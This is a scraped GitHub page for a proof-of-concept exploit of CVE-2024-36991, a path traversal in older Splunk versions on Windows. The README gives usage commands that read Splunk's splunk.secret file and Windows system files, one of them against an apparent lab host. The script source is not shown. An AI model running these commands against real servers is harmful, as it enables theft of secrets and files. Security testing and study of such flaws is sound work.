8000 GitHub - gunzf0x/CVE-2024-36991: Proof of Concept for CVE-2024-36991. Path traversal for Splunk versions below 9.2.2, 9.1.5, and 9.0.10 for Windows which allows arbitrary file read.
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content
/ CVE-2024-36991 Public

Proof of Concept for CVE-2024-36991. Path traversal for Splunk versions below 9.2.2, 9.1.5, and 9.0.10 for Windows which allows arbitrary file read.

3 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

gunzf0x/CVE-2024-36991

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
CVE-2024-36991.py
CVE-2024-36991.py
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2024-36991 - Splunk Path Traversal

Proof of Concept for CVE-2024-36991 which allows an attacker to read arbitrary files in Splunk for versions below to 9.2.2, 9.1.5, and 9.0.10 for Windows.

Usage

Read Splunk configuration files

To read Splunk files just run the script passing the target URL running Splunk and the configuration file you want to read. For example:

python3 CVE-2024-36991.py -u 'https://example.com:8000' -f '/etc/auth/splunk.secret'

Read Windows system files

To read Windows system files just add the flag --system-files. For example:

python3 CVE-2024-36991.py -u http://haze.htb:8000 -f '/Windows/System32/drivers/etc/hosts' --system-files

Always use this tool for good purposes. Be ethical (:

About

Proof of Concept for CVE-2024-36991. Path traversal for Splunk versions below 9.2.2, 9.1.5, and 9.0.10 for Windows which allows arbitrary file read.

Topics

splunk pentesting ethical-hacking path-traversal cve-2024-36991

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

1 fork
Report repository

Languages
0